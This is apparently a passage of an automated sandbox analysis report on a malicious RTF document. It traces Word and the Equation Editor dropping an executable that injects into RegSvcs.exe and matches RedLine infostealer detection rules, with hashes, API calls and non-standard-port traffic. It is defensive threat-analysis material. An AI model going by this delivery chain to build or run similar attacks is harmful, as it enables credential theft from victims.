                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008DEB075_2_008DEB07
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008E8B135_2_008E8B13
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008ACD615_2_008ACD61
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008B70065_2_008B7006
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008931905_2_00893190
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0089710E5_2_0089710E
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008812875_2_00881287
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008AF4195_2_008AF419
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008956805_2_00895680
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008A16C45_2_008A16C4
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008958C05_2_008958C0
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008A78D35_2_008A78D3
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008A1BB85_2_008A1BB8
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008B9D055_2_008B9D05
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0088FE405_2_0088FE40
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008A1FD05_2_008A1FD0
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008ABFE65_2_008ABFE6
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_001036005_2_00103600
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001AC40F6_2_001AC40F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001A78B86_2_001A78B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001AEEF06_2_001AEEF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001A6FE86_2_001A6FE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001AC4606_2_001AC460
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001AE6786_2_001AE678
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001A36D86_2_001A36D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001A36C86_2_001A36C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001A6CA06_2_001A6CA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004A18706_2_004A1870
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004A1C806_2_004A1C80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004A1C706_2_004A1C70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004A49606_2_004A4960
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004A39386_2_004A3938
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exe B5E250A95073B5DFE33F66C13CC89DA0FC8D3AF226E5EFB06BB8FCFD9A4CD6EC
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\notorious53209.exe B5E250A95073B5DFE33F66C13CC89DA0FC8D3AF226E5EFB06BB8FCFD9A4CD6EC
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: String function: 008A8B40 appears 42 times
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: String function: 008A0D27 appears 70 times
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: String function: 00887F41 appears 35 times
                    Source: ExtExport2[1].exe.2.drStatic PE information: Resource name: RT_STRING type: ARC archive data, dynamic LZW
                    Source: notorious53209.exe.2.drStatic PE information: Resource name: RT_STRING type: ARC archive data, dynamic LZW
                    Source: 2MbHBiqXH2.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                    Source: 5.2.notorious53209.exe.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 5.2.notorious53209.exe.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.notorious53209.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 5.2.notorious53209.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: Process Memory Space: notorious53209.exe PID: 3092, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 3116, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winRTF@7/45@3/2
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008EA2D5 GetLastError,FormatMessageW,5_2_008EA2D5
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008D8713 AdjustTokenPrivileges,CloseHandle,5_2_008D8713
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008D8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,5_2_008D8CC3
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008EB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,5_2_008EB59E
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008FF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,5_2_008FF121
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008F86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,5_2_008F86D0
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_00884FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,5_2_00884FE9
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$bHBiqXH2.rtfJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR73B8.tmpJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: 2MbHBiqXH2.rtfReversingLabs: Detection: 36%
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\notorious53209.exe "C:\Users\user\AppData\Roaming\notorious53209.exe"
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\notorious53209.exe"
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\notorious53209.exe "C:\Users\user\AppData\Roaming\notorious53209.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\notorious53209.exe"Jump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: 2MbHBiqXH2.LNK.0.drLNK file: ..\..\..\..\..\Desktop\2MbHBiqXH2.rtf
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: wntdll.pdb source: notorious53209.exe, 00000005.00000003.358079357.0000000002950000.00000004.00001000.00020000.00000000.sdmp, notorious53209.exe, 00000005.00000003.358487589.0000000002B30000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0099F090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,5_2_0099F090
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005AC340 push eax; retf 0064h2_2_005AC341
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A3B61 push eax; retf 0064h2_2_005A3B91
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A9F01 push esp; retf 2_2_005A9F04
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008A8B85 push ecx; ret 5_2_008A8B98
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\notorious53209.exeJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ASP.NET_4.0.30319\NamesJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 7474
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 7474
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 7474
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49165
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 7474
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49165
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49165
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_00884A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00884A35
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_009055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_009055FD
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008A33C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_008A33C7
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
